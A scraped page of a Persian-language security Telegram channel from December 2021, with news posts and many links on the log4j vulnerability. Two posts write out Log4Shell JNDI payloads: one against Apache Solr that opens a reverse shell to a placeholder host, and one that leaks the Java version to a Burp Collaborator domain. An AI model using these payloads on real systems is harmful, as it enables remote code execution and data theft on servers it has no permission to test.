امنیت اطلاعات – Telegram

امنیت اطلاعات

850 subscribers

2.38K photos

153 videos

156 files

2.58K links

آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en

برای عضویت در گروه پیام بدید:
@rect00

Download Telegram

About

Blog

Apps

Platform

امنیت اطلاعات

850 subscribers

امنیت اطلاعات

دستورات مفید برای خواندن Log

#cmd

@sec_nerd

👍1

1.04K views07:47

امنیت اطلاعات

نرم افزار پرداخت موبایلی Line Pay به اشتباه اطلاعات پرداختهای ۱۳۳ هزار کاربر را در گیت هاب منتشر کرد!

از این تعداد ۵۱ هزار کاربر ژاپنی و ۸۲ هزار تایوانی بوده اند و ۱۱ بار در طی ۱۰ هفته بازدید داشته است.

https://www.theregister.com/2021/12/07/line_pay_leaks_around_133000/

#leak
#line

@sec_nerd

LINE Pay leaks around 133,000 users' data to GitHub, of all places

Someone just accidentally put it there, says the messaging service company

1.12K views07:50

امنیت اطلاعات

نسخه ی ۹۵ مرورگر فایرفاکس به سندباکس جدید با نام RLBox مجهز شد.

این سندباکس قابلیت ایزوله کردن ماژولها و کامپوننت های مرورگر برای جلوگیری از آسیب زدن و سوء استفاده از آنها توسط دیگر اجزاء مرورگر را دارد.

https://thehackernews.com/2021/12/latest-firefox-95-includes-rlbox.html

#firefox

@sec_nerd

929 views07:55

امنیت اطلاعات

مرکز امنیت سایبری کانادا داکیومنت جالبی از نحوه ی رخ دادن حملات باج افزاری منتشر کرده

https://cyber.gc.ca/en/guidance/ransomware-playbook-itsm00099

#ransomware

@sec_nerd

1.08K views07:58

امنیت اطلاعات

#fun

@sec_nerd

1.1K views08:03

امنیت اطلاعات

apache solr EXP log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json

#log4j

@sec_nerd

1.03K views16:12

امنیت اطلاعات

Forwarded from Information Security

This media is not supported in your browser

VIEW IN TELEGRAM

بالابردن سطح دسترسی در ubuntu

https://securitylab.github.com/research/ubuntu-accountsservice-CVE-2021-3939/

#linux
#privesc

@sec_nerd

867 views16:26

امنیت اطلاعات

امنیت اطلاعات

apache solr EXP log4j /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json #log4j @sec_nerd

This media is not supported in your browser

VIEW IN TELEGRAM

apache solr log4j RCE

@sec_nerd

1.04K views16:31

امنیت اطلاعات

اگر تاحالا در مورد log4j و اکسپلویتش نخوندید این مطلب خوبیه

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

#log4j

@sec_nerd

1.08K views16:33

امنیت اطلاعات

این هم یه تیپ دیگه

https://twitter.com/11xuxx/status/1470142371312635906?s=20

#log4j

@sec_nerd

Verify Java Version, if not vulnerable don't bother and go to the next target! How? ${jndi:ldap://${env:JAVA_VERSION}.5ou7zt0bj640uqc0bsy1hvyrpiv8jx.burpcollaborator.net} #bugbountytips

1.06K views16:47

امنیت اطلاعات

افزونه ی burpsuite برای آسیب پذیری log4j

https://github.com/silentsignal/burp-log4shell

#log4j
#burpsuite

@sec_nerd

1.17K views16:49

امنیت اطلاعات

#fun
#log4j

@sec_nerd

1.22K views16:50

امنیت اطلاعات

بدست آوردن نسخه ی جاوا برای تشخیص آسیب پذیر بودن در برابر حمله ی log4shell
با استفاده از برپ

لیست هدرها
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt

#log4j

@sec_nerd

1.67K views16:55

امنیت اطلاعات

image_2021-12-20_02-05-55.png

Log4shell Vulnerability

#log4j

@sec_nerd

1.18K views08:06

امنیت اطلاعات

اپلیکیشن جاوایی آسیب پذیر در برابر حمله ی log4shell

https://github.com/tothi/log4shell-vulnerable-app

#log4j

@sec_nerd

1.32K views08:10

امنیت اطلاعات

توضیحی در خصوص آسیب پذیری log4j

https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/

#log4j

@sec_nerd

Hacking Articles

A Detailed Guide on Log4J Penetration Testing

In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the

1.55K views09:39

امنیت اطلاعات

❤️

#fun

@sec_nerd

👍2

1.48K views08:37

امنیت اطلاعات

PHP LFI with Nginx Assistance

https://bierbaumer.net/security/php-lfi-with-nginx-assistance/

#php
#lfi
#web

@sec_nerd

👍2

1.66K views08:42

امنیت اطلاعات

کشف آسیب پذیری RCE در روتر tplink و دریافت جایزه ی ۵۵ هزار دلاری

https://www.youtube.com/watch?v=zjafMP7EgEA

#RE

@sec_nerd

How We Hacked a TP-Link Router and Took Home $55,000 in Pwn2Own

Learn tricks and techniques like these, with us, in our amazing training courses!
https://flashback.sh/training

In this video we will show you how we found and exploited a chain of vulnerabilities in the TP-Link Archer AC1750 to win $5,000 in Pwn2Own Tokyo…

👍7👎2

1.6K views05:46